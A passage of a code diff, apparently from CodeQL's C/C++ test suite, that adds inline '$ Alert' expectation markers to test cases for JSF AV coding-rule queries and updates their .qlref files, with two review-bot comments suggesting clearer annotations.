79/SelfRegistering.cpp @@ -22,7 +22,7 @@ class MyOwner bottom = new MyElement(); // GOOD bottom->bind(this); - side = new MyElement(); // BAD (never released) + side = new MyElement(); // BAD (never released) // $ Alert side->donothing(123); } diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Variants.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Variants.cpp index 7727a038248d..0017230d3d0e 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Variants.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Variants.cpp 
@@ -23,7 +23,7 @@ class MyClass4 c = d = new int; // GOOD (d is deleted) e = local = new int; // BAD (e is not deleted) [NOT REPORTED] - f = new int; // GOOD (ID(f) is deleted) [FALSE POSITIVE] + f = new int; // GOOD (ID(f) is deleted) [FALSE POSITIVE] // $ Alert g = ID(new int); // GOOD (g is deleted) } @@ -66,10 +66,10 @@ class MyClass6 public: MyClass6() { - a = new int[10]; // BAD - b = (int *)calloc(10, sizeof(int)); // BAD - c = (int *)realloc(0, 10 * sizeof(int)); // BAD - d = strdup("string"); // BAD + a = new int[10]; // BAD // $ Alert + b = (int *)calloc(10, sizeof(int)); // BAD // $ Alert + c = (int *)realloc(0, 10 * sizeof(int)); // BAD // $ Alert + d = strdup("string"); // BAD // $ Alert } ~MyClass6() diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Wrapped.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Wrapped.cpp index 6b0eb79f41cb..a2c5fb8a991c 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Wrapped.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Wrapped.cpp @@ -43,7 +43,7 @@ class Wrapped2 public: Wrapped2(int len) { ptr1 = new char[len]; // GOOD - ptr2 = new char[len]; // BAD: not released in destructor + ptr2 = new char[len]; // BAD: not released in destructor // $ Alert Init(len); } @@ -56,7 +56,7 @@ class Wrapped2 void Init(int len) { ptr3 = new char[len]; // GOOD - ptr4 = new char[len]; // BAD: not released in destructor + ptr4 = new char[len]; // BAD: not released in destructor // $ Alert } void Shutdown() diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 82/AV Rule 82.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 82/AV Rule 82.cpp index 411902ac32d2..c2136dcf2876 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 82/AV Rule 82.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 82/AV Rule 82.cpp 
@@ -15,13 +15,13 @@ class Container { }; struct Bad1 { - Bad1& operator=(const Bad1& other) { + Bad1& operator=(const Bad1& other) { // $ Alert return const_cast(other); // BAD (does not return a reference to *this) } }; struct Bad2 { - Bad2 operator=(const Bad2& other) { + Bad2 operator=(const Bad2& other) { // $ Alert return *this; // BAD (return type is not a reference) } }; @@ -60,7 +60,7 @@ class TemplateReturnAssignment { return *this = TemplateReturnAssignment(_val); // GOOD (calls above `operator=`) } - TemplateReturnAssignment &operator=(bool b) { + TemplateReturnAssignment &operator=(bool b) { // $ Alert return *(new TemplateReturnAssignment(0)); // BAD (does not return a reference to *this) } @@ -196,7 +196,7 @@ struct TemplatedAssignmentGood { struct TemplatedAssignmentBad { template - typename second::type operator=(T val) { // BAD (missing &) + typename second::type operator=(T val) { // BAD (missing &) // $ Alert return *this; } }; diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 82/AV Rule 82.qlref b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 82/AV Rule 82.qlref index 3e47acb20c8e..260d6a99c420 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 82/AV Rule 82.qlref +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 82/AV Rule 82.qlref @@ -1 +1,2 @@ -jsf/4.10 Classes/AV Rule 82.ql +query: jsf/4.10 Classes/AV Rule 82.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 85/AV Rule 85.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 85/AV Rule 85.cpp index 292b8857cb97..18b56dd0d0b8 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 85/AV Rule 85.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 85/AV Rule 85.cpp 
@@ -1,12 +1,12 @@ -class MyClass1 { +class MyClass1 { // $ Alert public: int i; bool operator< (const MyClass1 &rhs){ return i < rhs.i; } // BAD: operator>= missing }; -class MyClass2 { +class MyClass2 { // $ Alert public: int i; bool operator< (const MyClass2 &rhs){ return i < rhs.i; } @@ -22,7 +22,7 @@ class MyClass3 { // GOOD }; -class MyClass4 { +class MyClass4 { // $ Alert public: int i; bool operator< (const MyClass4 &rhs){ return i < rhs.i; } @@ -76,7 +76,7 @@ class MyClass7 { MyClass7 myClass7; template -class MyClass8 { +class MyClass8 { // $ Alert public: int i; template @@ -100,7 +100,7 @@ void f8(void) { } template -class MyClass9 { +class MyClass9 { // $ Alert public: int i; template diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 85/AV Rule 85.qlref b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 85/AV Rule 85.qlref index 2608ffff47cb..72f5094881b6 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 85/AV Rule 85.qlref +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 85/AV Rule 85.qlref @@ -1 +1,2 @@ -jsf/4.10 Classes/AV Rule 85.ql +query: jsf/4.10 Classes/AV Rule 85.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 97/AV Rule 97.qlref b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 97/AV Rule 97.qlref index c08b4c966198..953d90e70be7 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 97/AV Rule 97.qlref +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 97/AV Rule 97.qlref @@ -1 +1,2 @@ -jsf/4.10 Classes/AV Rule 97.ql \ No newline at end of file +query: jsf/4.10 Classes/AV Rule 97.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 97/jsf97.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 97/jsf97.cpp index df00f154480a..8e8b7ab6ba7e 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 97/jsf97.cpp 
+++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 97/jsf97.cpp @@ -3,22 +3,22 @@ typedef int jmp_buf[16]; class C { public: -static int bad1(char xs[10]) +static int bad1(char xs[10]) // $ Alert { return sizeof(xs); } -static int bad2(char xs[]) +static int bad2(char xs[]) // $ Alert { return sizeof(xs); } -static int bad3(chars xs) +static int bad3(chars xs) // $ Alert { return sizeof(xs); } -static int bad4(chars const xs) +static int bad4(chars const xs) // $ Alert { return sizeof(xs); } @@ -37,7 +37,7 @@ static void good_longjmp(jmp_buf j) { } -static void bad_longjmp(int j[16]) +static void bad_longjmp(int j[16]) // $ Alert { } diff --git a/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 107/AV Rule 107.qlref b/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 107/AV Rule 107.qlref index 57f35c3bcf2d..e24890cc9a86 100644 --- a/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 107/AV Rule 107.qlref +++ b/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 107/AV Rule 107.qlref @@ -1 +1,2 @@ -jsf/4.13 Functions/AV Rule 107.ql +query: jsf/4.13 Functions/AV Rule 107.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 107/test.c b/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 107/test.c index 975d9e196daa..d0fc93965098 100644 --- a/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 107/test.c +++ b/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 107/test.c 
@@ -8,14 +8,14 @@ void test1() { - void inner1(); // BAD - extern int inner2(); // BAD + void inner1(); // BAD // $ Alert + extern int inner2(); // BAD // $ Alert void inner3() {}; // GOOD (this isn't a declaration, it's a GCC nested function) MY_FUNCTION_1(); // GOOD (in a macro) MY_FUNCTION_2(); // GOOD (in a macro) - MYTYPE inner4(); // BAD (function declaration is not in the macro) - void inner5(MYTYPE p); // BAD (function declaration is not in the macro) + MYTYPE inner4(); // BAD (function declaration is not in the macro) // $ Alert + void inner5(MYTYPE p); // BAD (function declaration is not in the macro) // $ Alert } #define STATICASSERT(cond) void staticAssert(int arg[(cond) ? (1) : (-1)]) diff --git a/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/AV Rule 114.qlref b/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/AV Rule 114.qlref index fbffe346bcfc..16716eca98f9 100644 --- a/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/AV Rule 114.qlref +++ b/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/AV Rule 114.qlref @@ -1 +1,2 @@ -jsf/4.13 Functions/AV Rule 114.ql +query: jsf/4.13 Functions/AV Rule 114.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/complex.c b/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/complex.c index fc190eb518cd..767eb4284440 100644 --- a/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/complex.c +++ b/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/complex.c @@ -1,10 +1,10 @@ _Complex double complexTest1(float a, float b) { - _Complex double x = __builtin_complex(a, b); // BAD + _Complex double x = __builtin_complex(a, b); // BAD // $ Alert } _Complex double complexTest2(float a, float b) { - auto x = __builtin_complex(a, b) * 2.0f; // BAD + auto x = __builtin_complex(a, b) * 2.0f; // BAD // $ Alert } _Complex double complexTest3(float a, float b) { 
diff --git a/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/test.c b/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/test.c index f0b2dff13308..021e9e5d2d7b 100644 --- a/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/test.c +++ b/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/test.c @@ -5,7 +5,7 @@ int f1(void) { } int f2(void) { - int x = 1; + int x = 1; // $ Alert } // BAD int f3(int b) { @@ -22,7 +22,7 @@ int f3(int b) { int f4(int b) { int x; if (b) { - x = 1; + x = 1; // $ Alert } else { x = 3; return 4; @@ -36,7 +36,7 @@ int f5(void) { int f6(int b) { int x; if (b) { - x = 1; + x = 1; // $ Alert } else { __builtin_unreachable(); } diff --git a/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/test.cpp b/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/test.cpp index 0c7e02ce9ac0..d31506df0167 100644 --- a/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/test.cpp +++ b/cpp/ql/test/query-tests/jsf/4.13 Functions/AV Rule 114/test.cpp @@ -15,7 +15,7 @@ MyValue g1() MyValue g2() { // BAD -} +} // $ Alert MyValue g3() { @@ -49,7 +49,7 @@ MyValue g7(bool c) DONOTHING DONOTHING // BAD -} +} // $ Alert typedef void MYVOID; MYVOID g8() @@ -73,7 +73,7 @@ TypePair::first g9() TypePair::second g10() { // BAD (the return type amounts to int) -} +} // $ Alert template typename TypePair::first g11() @@ -85,7 +85,7 @@ template typename TypePair::second g12() { // BAD (the return type amounts to T / int) -} +} // $ Alert void instantiate() { @@ -109,7 +109,7 @@ int g14(int x) { myThrow("fail"); // BAD (doesn't always throw) } -} +} // $ Alert int g15(int x) { 
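Review bot: In AV Rule 114/test.c the new `// $ Alert` markers sit on `int x = 1;` (f2) and `x = 1;` (f4, f6) with nothing saying why those statements are the reported location, and in f2 the existing `// BAD` stays on the closing brace one line below. Moving or adding the explanation on the annotated line would help the next reader, for example `x = 1; // BAD (can fall off the end without returning) // $ Alert`, worded to match what the query actually reports. `myConditionalThrow(x < 10, "fail"); // $ Alert` in g17 of test.cpp is split from its `// BAD` on the `return x;` line in the same way. The bodies of f4 and f6 continue outside their hunks.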
@@ -131,14 +131,14 @@ void myConditionalThrow(bool condition, const char *error) int g16(int x) { - myConditionalThrow(x < 10, "fail"); // BAD (doesn't always throw) + myConditionalThrow(x < 10, "fail"); // BAD (doesn't always throw) // $ Alert } int g17(int x) { try { - myConditionalThrow(x < 10, "fail"); + myConditionalThrow(x < 10, "fail"); // $ Alert } catch (...) { return x; // BAD (doesn't always reach this return) } @@ -186,7 +186,7 @@ int g22() { } int g23() { - Aborting().a(); // GOOD [FALSE POSITIVE] + Aborting().a(); // GOOD [FALSE POSITIVE] // $ Alert } [[__noreturn__]] diff --git a/cpp/ql/test/query-tests/jsf/4.16 Initialization/AV Rule 145/AV Rule 145.qlref b/cpp/ql/test/query-tests/jsf/4.16 Initialization/AV Rule 145/AV Rule 145.qlref index 27a18956b402..6bc33e6e8de0 100644 --- a/cpp/ql/test/query-tests/jsf/4.16 Initialization/AV Rule 145/AV Rule 145.qlref +++ b/cpp/ql/test/query-tests/jsf/4.16 Initialization/AV Rule 145/AV Rule 145.qlref @@ -1 +1,2 @@ -jsf/4.16 Initialization/AV Rule 145.ql +query: jsf/4.16 Initialization/AV Rule 145.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.16 Initialization/AV Rule 145/test.c b/cpp/ql/test/query-tests/jsf/4.16 Initialization/AV Rule 145/test.c index cd7b56779096..11a8f3593290 100644 --- a/cpp/ql/test/query-tests/jsf/4.16 Initialization/AV Rule 145/test.c +++ b/cpp/ql/test/query-tests/jsf/4.16 Initialization/AV Rule 145/test.c @@ -5,7 +5,7 @@ enum { E1C }; -enum { +enum { // $ Alert E2A = 1, E2B, E2C, @@ -13,7 +13,7 @@ enum { E2E }; -enum { +enum { // $ Alert E3A = 1, E3B = 2, E3C = 10, @@ -35,7 +35,7 @@ enum { E5C }; -enum { +enum { // $ Alert E6A, E6B, E6C = 10, diff --git a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 157/AV Rule 157.qlref b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 157/AV Rule 157.qlref index be23cb77df59..4a9a7d359f80 100644 --- a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 157/AV Rule 157.qlref 
+++ b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 157/AV Rule 157.qlref @@ -1 +1,2 @@ -jsf/4.21 Operators/AV Rule 157.ql +query: jsf/4.21 Operators/AV Rule 157.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 157/test.c b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 157/test.c index 69656806dd94..594ffff2eea3 100644 --- a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 157/test.c +++ b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 157/test.c @@ -17,19 +17,19 @@ void f(int x, int y) { if (x && y) x++; - if (x && y++) + if (x && y++) // $ Alert x++; if (x && pureFun()) x++; - if (x && imPureFun()) + if (x && imPureFun()) // $ Alert x++; if (x && strcmp("foo", "bar")) x++; - if (x && unknownFun("foo", "bar")) + if (x && unknownFun("foo", "bar")) // $ Alert x++; } diff --git a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 164/AV Rule 164.qlref b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 164/AV Rule 164.qlref index d6afaadc5957..637a63fa173b 100644 --- a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 164/AV Rule 164.qlref +++ b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 164/AV Rule 164.qlref @@ -1 +1,2 @@ -jsf/4.21 Operators/AV Rule 164.ql +query: jsf/4.21 Operators/AV Rule 164.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 164/test.c b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 164/test.c index 99cc6bd7db7d..d6f2ceb6148a 100644 --- a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 164/test.c +++ b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 164/test.c 
@@ -1,28 +1,28 @@ void f(unsigned char uc, signed char sc, int i) { - uc >> -1; // BAD + uc >> -1; // BAD // $ Alert uc >> 0; uc >> 7; - uc >> 8; // BAD + uc >> 8; // BAD // $ Alert - uc << -1; // BAD + uc << -1; // BAD // $ Alert uc << 0; uc << 7; - uc << 8; // BAD + uc << 8; // BAD // $ Alert uc >>= -1; // BAD [NOT DETECTED] uc >>= 0; // BAD [NOT DETECTED] uc >>= 7; uc >>= 8; // BAD [NOT DETECTED] - sc >> -1; // BAD + sc >> -1; // BAD // $ Alert sc >> 0; sc >> 7; - sc >> 8; // BAD + sc >> 8; // BAD // $ Alert - ((unsigned char)i) >> -1; // BAD + ((unsigned char)i) >> -1; // BAD // $ Alert ((unsigned char)i) >> 0; ((unsigned char)i) >> 7; - ((unsigned char)i) >> 8; // BAD + ((unsigned char)i) >> 8; // BAD // $ Alert } diff --git a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 165/AV Rule 165.qlref b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 165/AV Rule 165.qlref index a6ee879dfe95..d80a910b428d 100644 --- a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 165/AV Rule 165.qlref +++ b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 165/AV Rule 165.qlref @@ -1 +1,2 @@ -jsf/4.21 Operators/AV Rule 165.ql +query: jsf/4.21 Operators/AV Rule 165.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 165/test.c b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 165/test.c index 26d53e5a0c35..dc5248ee7c32 100644 --- a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 165/test.c +++ b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 165/test.c 
@@ -3,25 +3,25 @@ typedef unsigned int TUI; void f(int i, unsigned int ui, signed int si, TUI tui, volatile unsigned int vui, unsigned u, unsigned short us) { i = -i; - i = -ui; // BAD + i = -ui; // BAD // $ Alert i = -si; ui = -i; - ui = -ui; // BAD + ui = -ui; // BAD // $ Alert ui = -si; si = -i; - si = -ui; // BAD + si = -ui; // BAD // $ Alert si = -si; i = -(int)i; - i = -(unsigned int)i; // BAD + i = -(unsigned int)i; // BAD // $ Alert i = -(signed int)i; ui = -(int)ui; - ui = -(unsigned int)ui; // BAD + ui = -(unsigned int)ui; // BAD // $ Alert ui = -(signed int)ui; - tui = -tui; // BAD - vui = -vui; // BAD - u = -u; // BAD - us = -us; // BAD + tui = -tui; // BAD // $ Alert + vui = -vui; // BAD // $ Alert + u = -u; // BAD // $ Alert + us = -us; // BAD // $ Alert ui = -(5U); // BAD [NOT DETECTED] } diff --git a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 166/AV Rule 166.qlref b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 166/AV Rule 166.qlref index 956118bf8c59..bccd03161582 100644 --- a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 166/AV Rule 166.qlref +++ b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 166/AV Rule 166.qlref @@ -1 +1,2 @@ -jsf/4.21 Operators/AV Rule 166.ql +query: jsf/4.21 Operators/AV Rule 166.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 166/test.c b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 166/test.c index e272214215d5..5af0c3c70526 100644 --- a/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 166/test.c +++ b/cpp/ql/test/query-tests/jsf/4.21 Operators/AV Rule 166/test.c @@ -19,8 +19,8 @@ void f(void) { sizeof(vi); sizeof(*ip); sizeof(*vip); - sizeof(global++); + sizeof(global++); // $ Alert sizeof(pure()); - sizeof(impure()); + sizeof(impure()); // $ Alert } 
diff --git a/cpp/ql/test/query-tests/jsf/4.22 Pointers and References/AV Rule 176/176.cpp b/cpp/ql/test/query-tests/jsf/4.22 Pointers and References/AV Rule 176/176.cpp index 36c5d9a84fad..e263b8f89a09 100644 --- a/cpp/ql/test/query-tests/jsf/4.22 Pointers and References/AV Rule 176/176.cpp +++ b/cpp/ql/test/query-tests/jsf/4.22 Pointers and References/AV Rule 176/176.cpp @@ -15,31 +15,31 @@ operator_t good_get_operator(bool which) return which ? add : sub; } -int (*bad_get_operator(bool which))(int, int) +int (*bad_get_operator(bool which))(int, int) // $ Alert { return which ? add : sub; } typedef operator_t (*good_meta_t)(bool); -typedef int (*(*bad_meta_t)(bool))(int, int); +typedef int (*(*bad_meta_t)(bool))(int, int); // $ Alert int good_call(operator_t op, int lhs, int rhs) { return op(lhs, rhs); } -int bad_call(int(*op)(int, int), int lhs, int rhs) +int bad_call(int(*op)(int, int), int lhs, int rhs) // $ Alert { return op(lhs, rhs); } typedef int (*good_call_t)(operator_t, int, int); -typedef int (*bad_call_t)(int(*)(int, int), int, int); +typedef int (*bad_call_t)(int(*)(int, int), int, int); // $ Alert void usages() { operator_t good_op = add; - int (*bad_op)(int, int) = good_op; + int (*bad_op)(int, int) = good_op; // $ Alert good_meta_t good_meta_1 = good_get_operator; bad_meta_t good_meta_2 = good_meta_1; diff --git a/cpp/ql/test/query-tests/jsf/4.22 Pointers and References/AV Rule 176/176.qlref b/cpp/ql/test/query-tests/jsf/4.22 Pointers and References/AV Rule 176/176.qlref index b4218cca8350..18ed00a74cf6 100644 --- a/cpp/ql/test/query-tests/jsf/4.22 Pointers and References/AV Rule 176/176.qlref +++ b/cpp/ql/test/query-tests/jsf/4.22 Pointers and References/AV Rule 176/176.qlref @@ -1 +1,2 @@ -jsf/4.22 Pointers and References/AV Rule 176.ql +query: jsf/4.22 Pointers and References/AV Rule 176.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 186/AV Rule 186.qlref b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 186/AV Rule 186.qlref index f6fb0bccea00..a811ca432d09 100644 --- a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 186/AV Rule 186.qlref +++ b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 186/AV Rule 186.qlref @@ -1 +1,2 @@ -jsf/4.24 Control Flow Structures/AV Rule 186.ql +query: jsf/4.24 Control Flow Structures/AV Rule 186.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 186/test.c b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 186/test.c index 5dc0c0e94172..b40616d2ecf7 100644 --- a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 186/test.c +++ b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 186/test.c @@ -11,7 +11,7 @@ void called2() x++; } -void not_called() +void not_called() // $ Alert { x++; // BAD: unreachable } @@ -29,7 +29,7 @@ int main(int argc, const char* argv[]) while (1) { x++; } - x++; // BAD: unreachable + x++; // BAD: unreachable // $ Alert } else if (argc > 4) { x++; // BAD: unreachable [NOT DETECTED] } else if (argc > 5) { diff --git a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/AV Rule 193.c b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/AV Rule 193.c index 4a0f0e07dd0d..42431663c9c4 100644 --- a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/AV Rule 193.c +++ b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/AV Rule 193.c @@ -7,7 +7,7 @@ void m(enum color value) { switch(value) { case red: // compliant case green: // compliant - case blue: // non-compliant + case blue: // non-compliant // $ Alert f(value); case cyan: // compliant case magenta: // compliant 
@@ -33,7 +33,7 @@ void m(enum color value) { case green: // COMPLIANT f(value); break; - default: // NON-COMPLIANT + default: // NON-COMPLIANT // $ Alert g(value); case cyan: // COMPLIANT g(value); diff --git a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/AV Rule 193.qlref b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/AV Rule 193.qlref index ee2fb8681614..6fb2579f4d37 100644 --- a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/AV Rule 193.qlref +++ b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/AV Rule 193.qlref @@ -1 +1,2 @@ -jsf/4.24 Control Flow Structures/AV Rule 193.ql +query: jsf/4.24 Control Flow Structures/AV Rule 193.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/nested.c b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/nested.c index ae2ea4e9c8fe..2a2d79d3a54f 100644 --- a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/nested.c +++ b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/nested.c @@ -17,12 +17,12 @@ void nested1(int i) { void nested2(int i) { switch (i) { - case 1: + case 1: // $ Alert i = 1; break; { ; ; ; ; ; ; ; - default: + default: // $ Alert i = 3; } case 2: diff --git a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/test.c b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/test.c index 9cee970ddf11..3f9fe567a539 100644 --- a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/test.c +++ b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 193/test.c @@ -3,7 +3,7 @@ void f1(int i) { switch(i) { case 1: case 2: - case 3: + case 3: // $ Alert i = 3; // Bad case 4: case 5: 
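Review bot: The `// $ Alert` added to `case 1:` in nested2 (nested.c) marks a case that visibly ends in `break;`, and no comment explains why a result is expected there. If the result comes from the braced block after the `break;` being treated as part of the case and that is considered imprecise, `case 1: // $ SPURIOUS: Alert` would record it as such. If it is intended, a short `// BAD (...)` reason before the marker, as the other test files in this patch have, would make that clear. The switch continues outside the hunk.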
@@ -24,14 +24,14 @@ void f2(int i) { switch(i) { case 1: case 2: - case 3: + case 3: // $ Alert i = 3; // Bad case 4: case 5: case 6: i = 6; break; // OK: has break - default: + default: // $ Alert i = 10; // Bad: default not at end case 7: case 8: @@ -45,7 +45,7 @@ void f3(int i) { switch(i) { case 1: case 2: - case 3: + case 3: // $ Alert i = 3; // Bad case 4: case 5: @@ -59,7 +59,7 @@ void f3(int i) { return; // OK: has return case 10: case 11: - case 12: + case 12: // $ Alert i = 12; // Bad } } @@ -68,7 +68,7 @@ void f4(int i) { switch(i) { case 1: case 2: - case 3: + case 3: // $ Alert { i = 3; // Bad } diff --git a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 196/AV Rule 196.c b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 196/AV Rule 196.c index 85a29ed21ba3..d401c9aa170a 100644 --- a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 196/AV Rule 196.c +++ b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 196/AV Rule 196.c @@ -1,19 +1,19 @@ static void f(int x) { switch(x) { - } + } // $ Alert switch(x) { default:; - } + } // $ Alert switch(x) { case 0:; - } + } // $ Alert switch(x) { default: case 0:; - } + } // $ Alert switch(x) { case 0:; diff --git a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 196/AV Rule 196.qlref b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 196/AV Rule 196.qlref index 6a4f71e8e16d..1b51ce65ee6a 100644 --- a/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 196/AV Rule 196.qlref +++ b/cpp/ql/test/query-tests/jsf/4.24 Control Flow Structures/AV Rule 196/AV Rule 196.qlref @@ -1 +1,2 @@ -jsf/4.24 Control Flow Structures/AV Rule 196.ql +query: jsf/4.24 Control Flow Structures/AV Rule 196.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
